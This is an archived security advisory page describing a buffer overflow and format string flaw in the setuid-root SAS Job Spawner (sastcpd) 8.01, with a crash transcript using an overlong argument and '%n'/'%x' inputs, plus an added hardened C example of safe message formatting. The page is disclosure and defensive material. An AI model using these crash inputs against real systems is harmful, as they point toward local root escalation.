SecurityTracker.com
Category:  Application (Generic)  >  SAS - Job Spawner (sastcp)
Vendors:  SAS Institute Inc.
SAS Job Spawner Buffer Overflow and Format String Bug Let Local Users Execute Arbitrary Code on the System with Root Privileges and Gain Root Privileges on the System
SecurityTracker Alert ID:  1003393
SecurityTracker URL:  http://securitytracker.com/id?1003393
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jan 29 2002
Impact:  Execution of arbitrary code via local system, Root access via local system
Fix Available:  Yes
Vendor Confirmed:  Yes
Version(s): SAS Job Spawner for Open Systems version 8.01
Description:  Ministry-of-Peace reported a buffer overflow and format string vulnerability in the SAS Job Spawner (sastcpd). A local user can obtain root privileges on the system.

It is reported that sastcpd is installed with set user id (setuid) 'root' privileges by default. As a result, a local user who triggers either flaw can cause arbitrary code to be executed with root privileges, giving that user root access on the system.

A demonstration exploit transcript is provided:

$ sastcpd `perl -e "print 'A' x 1200"`
Invalid argument: AAAA[..cut..]AAAA.
Segmentation fault (core dumped)
$ ls -la core
-rw------- 1 root teknix 1454382 Jan 28 04:22 core
$ sastcpd %n
Segmentation fault (core dumped)
$ sastcpd %x
Invalid argument: 2.

The report credits Digital Shadow with discovering this flaw.
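
An added example (not from the advisory or from SAS): the transcript shows the argument echoed in an "Invalid argument: ..." message, with crashes on a 1200-byte argument and on %n. The C code below builds that message with a constant format string and a bounded buffer; MSG_MAX, the function names and the vulnerable shape in the comment are assumptions, since the sastcpd source is not on the page.

```c
#include <stdio.h>
#include <string.h>

#define MSG_MAX 128  /* assumed size of the error-message buffer */

/* One code shape consistent with the transcript (assumption, comment only):
 *     char msg[MSG_MAX];
 *     sprintf(msg, "Invalid argument: %s.", arg);  -- no bound on arg
 *     printf(msg);                                 -- arg used as the format
 */

/* Hardened: constant format string, hard bound on the output buffer.
 * Returns 0 if the message fit, 1 if it was truncated, -1 on bad input. */
int format_invalid_argument(char *out, size_t outlen, const char *arg)
{
    if (out == NULL || outlen == 0 || arg == NULL)
        return -1;
    int n = snprintf(out, outlen, "Invalid argument: %s.", arg);
    if (n < 0) {
        out[0] = '\0';
        return -1;
    }
    return (size_t)n >= outlen ? 1 : 0;
}

/* Prints the message; the argument is only ever data for a literal format. */
int report_invalid_argument(const char *arg)
{
    char msg[MSG_MAX];
    int rc = format_invalid_argument(msg, sizeof msg, arg);
    if (rc < 0)
        return rc;
    fprintf(stderr, "%s%s\n", msg, rc == 1 ? " [truncated]" : "");
    return rc;
}

int main(void)
{
    char big[1201];                 /* constructed input: 1200 'A's */
    memset(big, 'A', 1200);
    big[1200] = '\0';
    report_invalid_argument("%x");  /* echoed literally, not interpreted */
    report_invalid_argument("%n");  /* echoed literally, nothing is written */
    report_invalid_argument(big);   /* cut to MSG_MAX - 1 bytes, no overflow */
    return 0;
}
```

With this shape, `%x` and `%n` come back verbatim in the message and the long argument is reported as truncated instead of overrunning the buffer.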

Impact:  A local user can execute arbitrary code on the system with root level privileges, giving that user root access on the system.
Solution:  The vendor reportedly notes that these problems were fixed in version 8.2. Contact the vendor for an update.
Vendor URL:  www.sas.com/SASHome.html
Cause:  Boundary error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  "Wodahs Latigid" <wodahs@mail.com>
Message History:   This archive entry has one or more follow-up message(s) listed below.
Jan 30 2002 (Vendor Issued a Fix) Re: SAS Job Spawner Buffer Overflow and Format String Bug Let Local Users Execute Arbitrary Code on the System with Root Privileges and Gain Root Privileges on the System   (elliptic <elliptic@localhost.localdomain>)
The vendor released a technical note in February 2001 that appears to address this vulnerability.
Jan 31 2002 (Additional Vulnerabilities Are Reported) Re: SAS Job Spawner Buffer Overflow and Format String Bug Let Local Users Execute Arbitrary Code on the System with Root Privileges and Gain Root Privileges on the System   (rpc <rpc@unholy.net>)
A user has reported additional vulnerabilities in SAS Job Spawner.



 Source Message Contents

Date:  Tue, 29 Jan 2002 09:59:41 +0000
From:  "Wodahs Latigid" <wodahs@mail.com>
Subject:  [VulnWatch] sastcpd Buffer Overflow and Format String Vulnerabilities

 

----------------------------------------------------------
sastcpd Buffer Overflow and Format String Vulnerabilities 
Ministry-of-Peace - www.ministryofpeace.co.uk             
----------------------------------------------------------

SYNOPSIS

"SAS software provides the foundation, tools, and
solutions for data analysis, report generation,
and enterprise-wide information delivery."

The "SAS Job Spawner", sastcpd, contains both a buffer
overflow and a format string vulnerability.

SAS Support say that these problems were fixed in version
8.2 of this product, but we are unable to confirm as we
do not have access to this version.


IMPACT

sastcpd is installed setuid root by default, and therefore
full root privileges can be obtained through exploitation
of either of these vulnerabilities.


DETAILS

Version tested:
SAS Job Spawner for Open Systems version 8.01

$ sastcpd `perl -e "print 'A' x 1200"`
Invalid argument: AAAA[..cut..]AAAA.
Segmentation fault (core dumped)
$ ls -la core
-rw-------  1 root    teknix     1454382 Jan  28 04:22 core
$ sastcpd %n
Segmentation fault (core dumped)
$ sastcpd %x
Invalid argument: 2.


CREDITS

Vulnerability discovered by Digital Shadow


INFO

Security Advisory #05
Published: 29th January 2002




Copyright 2007, SecurityGlobal.net LLC